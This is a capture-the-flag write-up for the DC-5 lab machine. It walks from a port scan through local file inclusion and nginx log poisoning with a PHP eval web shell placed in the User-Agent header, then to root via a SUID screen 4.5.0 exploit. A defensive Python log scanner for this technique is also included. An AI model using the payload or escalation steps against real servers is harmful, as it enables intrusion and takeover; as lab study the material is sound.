
DC-5



1 Information gathering

First find the live hosts; once the IP is confirmed, scan all ports. NFS and HTTP services are open.

{"ip":"192.168.68.90","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":80,"service":"http","Banner":"","url":"http://192.168.68.90:80"}
{"ip":"192.168.68.90","port":111,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":58580,"service":"nfs","Banner":"","url":""}
{"ip":"192.168.68.90","port":25,"service":"","Banner":"","url":""}
{"url":"http://192.168.68.90:80","StatusCode":200,"Title":"Welcome","HeaderDigest":"server:nginx/1.6.2","Length":4025,"KeywordFinger":"","HashFinger":""}

Looked at the web app: there is only a form-submission feature, but this nginx version has a known parsing vulnerability.

Also looked at NFS; nothing is registered, so it is unusable. That leaves only the web app.

2 A closer look at the web app

Ran a directory scan; it only turned up these few paths.

Opened Burp and clicked through every page, inspecting the requests. Stared at it for a long time without spotting an entry point. Then, on the page shown after submitting the form, I hit ctrl + r to refresh a dozen or so times and noticed that the "Copyright © 2019" at the bottom of the page changes. footer.php had shown up in the earlier directory scan, so capture the request and take a look.

The two requests have different timestamps, so the guess is that the year is generated from the current time.

So thankyou.php should include footer.php, but that include is most likely hard-coded in the PHP, something like <?php do_sth(); include("footer.php"); ?>, which doesn't seem to help much.

Went and looked at the writeup; it feels a bit contrived. Normal business logic has no need for a file parameter to include footer.php, so this is a vulnerability left there on purpose...

Tried the PHP stream wrappers; they don't work, so only file inclusion is possible (logs/session). The log records the UA header, so writing the one-liner into the UA is the better option (avoids encoding problems).

GET /xxx HTTP/1.1
Host: 192.168.68.90
User-Agent: <?php eval($_REQUEST[x]); ?>

Connected with AntSword. The web log path: /var/log/nginx/access.log
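As an added defensive example (not part of the original writeup), the check below parses nginx combined-format access log lines and flags both halves of the technique just described: a PHP tag landing in a logged field (log poisoning) and a request parameter pointing at a log or process path (the inclusion itself). The log lines, IPs and paths are constructed sample data.

```python
import re

# Constructed sample access.log lines in nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
192.168.68.1 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 4025 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.68.1 - - [10/Mar/2024:10:00:05 +0000] "GET /xxx HTTP/1.1" 404 168 "-" "<?php eval($_REQUEST[x]); ?>"
192.168.68.1 - - [10/Mar/2024:10:00:09 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 512 "-" "curl/7.88.1"
"""

# nginx combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Poisoning signal: PHP open tags or code-execution functions in any client-controlled field.
PHP_TAG_RE = re.compile(r'<\?(php|=)|\beval\s*\(|\bsystem\s*\(', re.IGNORECASE)
# Inclusion signal: traversal or paths that an LFI would typically pull into the interpreter.
LFI_PATH_RE = re.compile(r'(\.\./|/var/log/|/proc/self/|/etc/passwd|sess_)', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(text):
    """Return (line_number, indicator, client_ip) for every suspicious log line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a production scanner would count these too
        for field in ("request", "referer", "ua"):
            if PHP_TAG_RE.search(rec[field]):
                findings.append((lineno, "php_in_" + field, rec["ip"]))
        if LFI_PATH_RE.search(rec["request"]):
            findings.append((lineno, "lfi_path_in_request", rec["ip"]))
    return findings


if __name__ == "__main__":
    for lineno, indicator, ip in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {indicator} from {ip}")
```

Seeing the poisoning hit and the inclusion hit from the same client within seconds is the pattern to alert on; either signal alone produces more false positives.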

3 Privilege escalation

First get a reverse shell; AntSword's shell is too painful to use.

Look at passwd: there are two usable accounts, dc and root, but nothing exploitable for dc was found afterwards.

root:x:0:0:root:/root:/bin/bash
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash

Ran LinEnum.sh; nothing directly exploitable, but it lists the third-party tool screen (I've used it before; not as nice as tmux). I had seen earlier that this kind of software can have privilege-escalation vulnerabilities, so I followed that thread.

[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19  2019 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19  2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10104 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 1031296 Feb 11  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 90456 Aug 13  2014 /sbin/mount.nfs

screen -list showed the session list is empty. Searched for screen privilege escalation and found an existing exploit; just use searchsploit.

Upload 41154.sh to the target machine and run it.

Got the flag.